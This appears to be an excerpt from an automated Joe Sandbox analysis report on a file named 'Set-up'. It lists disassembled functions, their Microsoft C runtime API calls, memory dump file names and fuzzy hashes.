wcsncpy_s.MSVCR100(?,00000003,?,00000002), ref: 6BB4452E
wcsncpy_s.MSVCR100(?,?,?,?), ref: 6BB44562
_errno.MSVCR100 ref: 6BB713A1
_invalid_parameter_noinfo.MSVCR100 ref: 6BB713AB
_errno.MSVCR100 ref: 6BB713BC

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: wcsncpy_s$_errno$_invalid_parameter_noinfo
String ID:
API String ID: 2268458229-0
Opcode ID: 482527dddfd8eb0907e252b437bd19494a6dfea260ba71937d5eb1d190559979
Instruction ID: 3385ddb838fb9f7342a288dce6da5b6c1c9c35060f5d526eef391c9bc94668b7
Opcode Fuzzy Hash: 482527dddfd8eb0907e252b437bd19494a6dfea260ba71937d5eb1d190559979
Instruction Fuzzy Hash: FD710C31D002E6EBDF249F18C8610AD37B2FBA4705B2685B6EC6493504FF79C961EB91

Function 6BB407A7 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6BBBC14C
_crt_debugger_hook.MSVCR100(00000001), ref: 6BBBC159
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6BBBC161
UnhandledExceptionFilter.KERNEL32(6BBBC198), ref: 6BBBC16C
_crt_debugger_hook.MSVCR100(00000001), ref: 6BBBC17D
GetCurrentProcess.KERNEL32(C0000409), ref: 6BBBC188
TerminateProcess.KERNEL32(00000000), ref: 6BBBC18F

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
String ID:
API String ID: 3369434319-0
Opcode ID: 57e87064965621e26375661df4d2549b5ced5c13f8b0623f5f10dd00f1ae427a
Instruction ID: 7af7199b6b07258709c6075ec4626adfa8722e0207591f3f1112d288e18ebdd7
Opcode Fuzzy Hash: 57e87064965621e26375661df4d2549b5ced5c13f8b0623f5f10dd00f1ae427a
Instruction Fuzzy Hash: 2D21BDB89052049FDF21DF6EE8496783BB4FB0A388F40415AE40987362E7F6D9828F15

Function 6BB452E4 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

_errno.MSVCR100(74DE8410,?,?,6BB4726E,?,0000000A,00000000), ref: 6BB678BE
_invalid_parameter_noinfo.MSVCR100(74DE8410,?,?,6BB4726E,?,0000000A,00000000), ref: 6BB678C8
_errno.MSVCR100(0000009C,74DE8410,?,?,6BB4726E,?,0000000A,00000000), ref: 6BB678D4
_invalid_parameter_noinfo.MSVCR100(0000009C,74DE8410,?,?,6BB4726E,?,0000000A,00000000), ref: 6BB678DE
_errno.MSVCR100(0000009C,74DE8410,?,?,6BB4726E,?,0000000A,00000000), ref: 6BB678EA

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 55d666dd8a699c4ebf395b86ab4b46f2912cd88d49c6b26b25ca133e50ddebef
Instruction ID: b92d3a7c39043667b711fa24aba6ad34b03f9ece1d480db64a850b8122b8d48d
Opcode Fuzzy Hash: 55d666dd8a699c4ebf395b86ab4b46f2912cd88d49c6b26b25ca133e50ddebef
Instruction Fuzzy Hash: 16214530548AC5DBD3064F3E889079D7B51FB53B84F2040AEE9860A281E7F88C42DB62

Function 6BB533B8 Relevance: 54.6, APIs: 30, Strings: 1, Instructions: 367COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT(?), ref: 6BB5340B
_calloc_crt.MSVCR100(00000002,00000002), ref: 6BB53438
_wdupenv_s.MSVCR100(?,00000000,?), ref: 6BB53455
_wcslen.LIBCMT(?), ref: 6BB53469
_wcslen.LIBCMT(?), ref: 6BB5347D
wcscpy_s.MSVCR100(?,?,00000000,00000000,00000000,00000000,00000000), ref: 6BB534B4
_wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000,00000000), ref: 6BB534C6
wcscpy_s.MSVCR100(?,?,00000000,00000000,00000000,00000000,00000000), ref: 6BB534EA
_wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000,00000000), ref: 6BB534FC

Strings

SystemRoot, xrefs: 6BB533E5

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _wcslen$wcscpy_s$_calloc_crt_wdupenv_s
String ID: SystemRoot
API String ID: 2825862306-2034820756
Opcode ID: aa6a079fb12e10cc544b62cf8528568b89e8e9b8589df0758b3f6ff5f160a25c
Instruction ID: 9b8e4c9539688be4331e8b328c9edc0910cb6bd79dd6b28ab3f464c0e7c5a387
Opcode Fuzzy Hash: aa6a079fb12e10cc544b62cf8528568b89e8e9b8589df0758b3f6ff5f160a25c
Instruction Fuzzy Hash: 73D19772D002999FDB20DFA8DC81A9EB7F4FF0A354B10446EE805A7250EB39AD41DB61

Function 6BB4DD9D Relevance: 49.3, APIs: 10, Strings: 18, Instructions: 277COMMON

Download Yara Rule

APIs

operator+.LIBCMT ref: 6BB4DCE4
DName::DName.LIBCMT ref: 6BB4E26D
DName::operator+.LIBCMT ref: 6BB4E274
DName::DName.LIBCMT ref: 6BB4F2B2
DName::operator+.LIBCMT ref: 6BB4F2B9

Strings

UNKNOWN, xrefs: 6BB51D6A
long , xrefs: 6BB51E22
unsigned , xrefs: 6BB4E265
double, xrefs: 6BB4DDE4
__int8, xrefs: 6BB4DBDF
volatile, xrefs: 6BB4DCB8
volatile, xrefs: 6BB4DCCA
__int128, xrefs: 6BB4DC34
<unknown>, xrefs: 6BB51D74
wchar_t, xrefs: 6BB4E22E
__int16, xrefs: 6BB4DC20
__w64 , xrefs: 6BB4DBF6
signed , xrefs: 6BB51D60
__int32, xrefs: 6BB4DC2A
const, xrefs: 6BB4DCA2
__int64, xrefs: 6BB51D44
bool, xrefs: 6BB4F7AA
void, xrefs: 6BB51D86

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: NameName::Name::operator+$operator+
String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$const$double$long $signed $unsigned $void$volatile$wchar_t
API String ID: 919369367-1531502760
Opcode ID: 3ec0261b733e9fd1370ed719e84d51b336ec030802a53f588675a21559d2dd07
Instruction ID: c8b5fd5abe1a1970384709b8ae49ffecb87daa8a087de87561cec00807f86545
Opcode Fuzzy Hash: 3ec0261b733e9fd1370ed719e84d51b336ec030802a53f588675a21559d2dd07
Instruction Fuzzy Hash: 0C91D1B5D841C9AFCF08CEA8E980AAD7774FF06350F104596E421EB19DC77D8A45EB22

Function 6BB5022F Relevance: 47.0, APIs: 31, Instructions: 498fileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6BB500E5
_isatty.MSVCR100(?,?,00000002,?,?,6BB503AC,?,?,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002), ref: 6BB502BE
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6BB503AC,?,?,?,6BB503C8,00000010,6BB689FE), ref: 6BB502EF
__doserrno.MSVCR100(00000002,?,?,6BB503AC,?,?,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?), ref: 6BB6FD95
_errno.MSVCR100(00000002,?,?,6BB503AC,?,?,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?), ref: 6BB6FD9C
_invalid_parameter_noinfo.MSVCR100(00000002,?,?,6BB503AC,?,?,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?), ref: 6BB6FDA7
__doserrno.MSVCR100(?,00000002,?,?,6BB503AC,?,?,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0), ref: 6BB6FDC2
_errno.MSVCR100(?,00000002,?,?,6BB503AC,?,?,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0), ref: 6BB6FDCA
_invalid_parameter_noinfo.MSVCR100(?,00000002,?,?,6BB503AC,?,?,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0), ref: 6BB6FDD5
__lseeki64_nolock.LIBCMT ref: 6BB6FDE6
_getptd.MSVCR100(?,00000002,?,?,6BB503AC,?,?,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0), ref: 6BB6FE00
GetConsoleMode.KERNEL32(?,?,?,00000002,?,?,6BB503AC,?,?,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002), ref: 6BB6FE1E
GetConsoleCP.KERNEL32(?,6BB503AC,?,?,?,6BB503C8,00000010,6BB689FE,?,00000000,00000002,?,6BBE35D0,?,?), ref: 6BB6FE3E
isleadbyte.MSVCR100(00000000), ref: 6BB6FEAE
__fassign.LIBCMT(?,?,00000002), ref: 6BB6FED8
__fassign.LIBCMT(?,?,00000001), ref: 6BB6FEFC
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6BB6FF2E
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6BB6FF57
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6BB6FFB0
_putwch_nolock.MSVCR100(?), ref: 6BB70013
_putwch_nolock.MSVCR100(0000000D), ref: 6BB70040

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: FileWrite$Console__doserrno__fassign_errno_invalid_parameter_noinfo_putwch_nolock$ByteCharErrorLastModeMultiWide__lseeki64_nolock_getptd_isattyisleadbyte
String ID:
API String ID: 1737003884-0
Opcode ID: 74294214da9316933cf9ac95718260c864812caca4165bd4272d1927dd42469e
Instruction ID: 51781c08901157206c69a12df51d284901488e5c8a7656c0e198902d107b284c
Opcode Fuzzy Hash: 74294214da9316933cf9ac95718260c864812caca4165bd4272d1927dd42469e
Instruction Fuzzy Hash: EA128036A066A89FCB219F28CC80BDD77B4FF0A314F4401EAE419E7985D7799980CF52

Function 6BB55276 Relevance: 46.0, APIs: 23, Strings: 3, Instructions: 455COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BB55256
DName::operator+.LIBCMT ref: 6BB5525D
DName::DName.LIBCMT ref: 6BB55319
DName::operator+.LIBCMT ref: 6BB55320
DName::operator=.LIBCMT ref: 6BB5536F
DName::operator=.LIBCMT ref: 6BB58874
DName::DName.LIBCMT ref: 6BB6D7AA

Strings

operator, xrefs: 6BB5524E
`string', xrefs: 6BB6D86D
`anonymous namespace', xrefs: 6BB6D8A4

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: NameName::$Name::operator+Name::operator=
String ID: `anonymous namespace'$`string'$operator
API String ID: 3850895366-815891235
Opcode ID: 72453f3e8146163b3333f21643ed21c9ce9ac08135fd43ef716d35f218b3d622
Instruction ID: 00a331d05298d3b0ca951b10372767bed743c7865fb850c70693daad3ab6c882
Opcode Fuzzy Hash: 72453f3e8146163b3333f21643ed21c9ce9ac08135fd43ef716d35f218b3d622
Instruction Fuzzy Hash: EF027F718481C99FCF04DFA4E895AFDBBB4FF46744F1000AAE212AB164EB399E45CB45

Function 6BB53687 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB536BF
_errno.MSVCR100 ref: 6BB536C9
_wspawnve.MSVCR100(?,?,?,?), ref: 6BB536DA

Part of subcall function 6BB535D0: wcsrchr.MSVCR100(?,0000005C), ref: 6BB5360D
Part of subcall function 6BB535D0: wcsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6BB53617
Part of subcall function 6BB535D0: wcsrchr.MSVCR100(00000000,0000002E), ref: 6BB53636
Part of subcall function 6BB535D0: _waccess_s.MSVCR100(?,00000000), ref: 6BB5364A

_errno.MSVCR100 ref: 6BB536EE
_errno.MSVCR100 ref: 6BB536F7
_errno.MSVCR100 ref: 6BB5371A
_errno.MSVCR100 ref: 6BB68499
_invalid_parameter_noinfo.MSVCR100 ref: 6BB684A4
_invalid_parameter_noinfo.MSVCR100 ref: 6BB684B7
_errno.MSVCR100 ref: 6BB684C4
wcschr.MSVCR100(?,0000002F), ref: 6BB684D7
_wdupenv_s.MSVCR100(?,00000000,PATH), ref: 6BB684F0
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6BB6850A
_calloc_crt.MSVCR100(00000104,00000002), ref: 6BB68520
_wcslen.LIBCMT(00000000), ref: 6BB68549
wcscat_s.MSVCR100(00000000,00000104,6BB73050), ref: 6BB68567
_wcslen.LIBCMT(00000000), ref: 6BB68574
_wcslen.LIBCMT(?,00000000), ref: 6BB6857F
wcscat_s.MSVCR100(00000000,00000104,?), ref: 6BB6859D
_errno.MSVCR100 ref: 6BB685AD
_wspawnve.MSVCR100(?,00000000,?,?), ref: 6BB685BE
_errno.MSVCR100 ref: 6BB685D2
__doserrno.MSVCR100 ref: 6BB685DC
free.MSVCR100(00000000), ref: 6BB6862B

Strings

PATH, xrefs: 6BB684E6

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_wcslenwcsrchr$_invalid_parameter_noinfo_wspawnvewcscat_s$__doserrno__invoke_watson_calloc_crt_waccess_s_wdupenv_sfreewcschr
String ID: PATH
API String ID: 3726462291-1036084923
Opcode ID: b88380723249b957ace146c88b7d8a10c2fe33989aa32a26a538edaa7b49eb25
Instruction ID: e55a8eb4bd38f123b385ff0c7de0ee98ce8bc3bb85f9daafba9f377717482cf1
Opcode Fuzzy Hash: b88380723249b957ace146c88b7d8a10c2fe33989aa32a26a538edaa7b49eb25
Instruction Fuzzy Hash: 71510572C04694AFCB219F75CD4196E3775FF06368B200596E821D7294FB3DC950EA63

Function 6BB50AC7 Relevance: 42.3, APIs: 28, Instructions: 254COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB50B2C
_waccess_s.MSVCR100(?,00000000), ref: 6BB50B36

Part of subcall function 6BB427B6: GetFileAttributesW.KERNEL32(?), ref: 6BB427D7

_errno.MSVCR100 ref: 6BB50B43
_wdupenv_s.MSVCR100(?,00000000,?), ref: 6BB50B66

Part of subcall function 6BB4FD24: _lock.MSVCR100(00000007,6BB4FD98,0000000C), ref: 6BB4FD32

_wcslen.LIBCMT(?), ref: 6BB50B8B
_errno.MSVCR100(00000000,00000000,00000000), ref: 6BB50BAE
_wcslen.LIBCMT(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB50C08
wcscpy_s.MSVCR100(00000000,00000002,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB50C51
_waccess_s.MSVCR100(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BB50C68
_errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB50C8B
wcscpy_s.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB50CA5
free.MSVCR100(?), ref: 6BB50CE1
_errno.MSVCR100 ref: 6BB710C4
_invalid_parameter_noinfo.MSVCR100 ref: 6BB710CE
_wfullpath.MSVCR100(?,?,?), ref: 6BB710E7
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6BB7110D
_wcslen.LIBCMT(?,00000000,00000000,00000000,00000000,00000000), ref: 6BB71118
_calloc_crt.MSVCR100(00000002,00000002,?,00000000,00000000,00000000,00000000,00000000), ref: 6BB71124
_errno.MSVCR100(?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB7113F
_errno.MSVCR100(?,?,?,00000000,00000000,00000000), ref: 6BB7115A
_wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000), ref: 6BB7116A
_calloc_crt.MSVCR100(00000002,00000002,?,?,?,?,00000000,00000000,00000000), ref: 6BB71176
_errno.MSVCR100 ref: 6BB711AF
_errno.MSVCR100 ref: 6BB711BA
free.MSVCR100(?), ref: 6BB711CC
free.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB711F0
_errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB711F6
free.MSVCR100(?), ref: 6BB71209

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$_wcslenfree$_calloc_crt_waccess_swcscpy_s$AttributesFile__invoke_watson_invalid_parameter_noinfo_lock_wdupenv_s_wfullpath
String ID:
API String ID: 1320518012-0
Opcode ID: f9766ef5d1a9d1ed28c095f48d396afbe1dafd47c123b8e326560c377767b888
Instruction ID: 7352bb6d0813a4d48253b21c7d02451b517f0181b63b562e9e8a038760f4ec38
Opcode Fuzzy Hash: f9766ef5d1a9d1ed28c095f48d396afbe1dafd47c123b8e326560c377767b888
Instruction Fuzzy Hash: 4191CF31D502A8AEDB21AF74DC9979D77B5FF15708F5000E6D418EB264EB388A809FA1

Function 6BB4B398 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 110libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4B3A0
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6BB4B3BD
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6BB4B3CA
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6BB4B3D7
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6BB4B3E4
TlsAlloc.KERNEL32(?,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4B420
TlsSetValue.KERNEL32(00000000,?,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4B43B
__init_pointers.LIBCMT ref: 6BB4B445

Part of subcall function 6BB4B365: _encoded_null.MSVCR100(74DEDFB0,6BB4B44A,?,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4B368
Part of subcall function 6BB4B365: __initp_misc_winsig.LIBCMT ref: 6BB4B388

EncodePointer.KERNEL32(?,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4B456
EncodePointer.KERNEL32(?,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4B463
EncodePointer.KERNEL32(?,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4B470
EncodePointer.KERNEL32(?,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4B47D
DecodePointer.KERNEL32(?,?,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4B49E
_calloc_crt.MSVCR100(00000001,00000214,?,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4B4B3
DecodePointer.KERNEL32(00000000,?,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4B4CD
_initptd.MSVCR100(00000000,00000000,?,?,6BB4B247,6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4B4D8

Part of subcall function 6BB4215F: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BB42200,00000008,6BB675E9,00000000,00000000), ref: 6BB42170
Part of subcall function 6BB4215F: _lock.MSVCR100(0000000D), ref: 6BB421A4
Part of subcall function 6BB4215F: InterlockedIncrement.KERNEL32(?), ref: 6BB421B1
Part of subcall function 6BB4215F: _lock.MSVCR100(0000000C), ref: 6BB421C5

GetCurrentThreadId.KERNEL32 ref: 6BB4B4DF

Strings

FlsFree, xrefs: 6BB4B3D9
FlsAlloc, xrefs: 6BB4B3B7
KERNEL32.DLL, xrefs: 6BB4B39B
FlsGetValue, xrefs: 6BB4B3BF
FlsSetValue, xrefs: 6BB4B3CC

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule_lock$AllocCurrentIncrementInterlockedThreadValue__init_pointers__initp_misc_winsig_calloc_crt_encoded_null_initptd
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3305441573-3819984048
Opcode ID: 607bc5327c8a7af7adaf08c15e0ea2692032f556211a18423c87e170a0cdc935
Instruction ID: 3f6b3dc9c1a967e6998f8e111a862df95aa015e970ecd22dca7e8670e098e02c
Opcode Fuzzy Hash: 607bc5327c8a7af7adaf08c15e0ea2692032f556211a18423c87e170a0cdc935
Instruction Fuzzy Hash: 9A314E358002E1ABDF32AB76D84563E3BE4FB067A1B154516E914D31B8DB7EC442DF60

Function 6BBB612B Relevance: 36.3, APIs: 24, Instructions: 344COMMON

Download Yara Rule

APIs

operator+.LIBCMT ref: 6BBB6146

Part of subcall function 6BBB5907: DName::DName.LIBCMT ref: 6BBB591A
Part of subcall function 6BBB5907: DName::operator+.LIBCMT ref: 6BBB5921

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: 9971671588035c1be3dc016aa831dfbcb864b239daa85d2e51e347ed8cf8bb4f
Instruction ID: ba7d20c963e744c938de513d8f4bf0e432f3f948f678e7020affa13090277231
Opcode Fuzzy Hash: 9971671588035c1be3dc016aa831dfbcb864b239daa85d2e51e347ed8cf8bb4f
Instruction Fuzzy Hash: E9D11D75900289AFDF00DFA8D891AFDBBF8FF05314F10406AE516AB294DB789E45CB61

Function 6BB526C3 Relevance: 34.7, APIs: 23, Instructions: 213COMMON

Download Yara Rule

APIs

wcsnlen.MSVCR100(?,00007FFF), ref: 6BB526ED
wcsnlen.MSVCR100(?,00007FFF,?,00007FFF), ref: 6BB526F8
_calloc_crt.MSVCR100(00000002,00000002), ref: 6BB52717
wcscpy_s.MSVCR100(00000000,00000002,?), ref: 6BB5272E
wcscpy_s.MSVCR100(?,00000002,?,00000000,00000002,?), ref: 6BB5274B

Part of subcall function 6BB5248A: wcschr.MSVCR100(00000000,0000003D,74DEDF80,00000000,00000000), ref: 6BB524B5
Part of subcall function 6BB5248A: free.MSVCR100(?,74DEDF80,00000000,00000000), ref: 6BB52528

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BB52789
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BB527A5
_calloc_crt.MSVCR100(00000000,00000001), ref: 6BB527B2
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BB527CB
_strlen.LIBCMT(?), ref: 6BB527DD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 6BB527FB
_errno.MSVCR100 ref: 6BB52820
_errno.MSVCR100 ref: 6BB70FD6
_invalid_parameter_noinfo.MSVCR100 ref: 6BB70FE1
wcschr.MSVCR100(?,0000003D), ref: 6BB70FF1
wcsnlen.MSVCR100(-00000002,00007FFF), ref: 6BB71015
_wcslen.LIBCMT(?), ref: 6BB71021
_calloc_crt.MSVCR100(00000001,00000002,?), ref: 6BB7102C
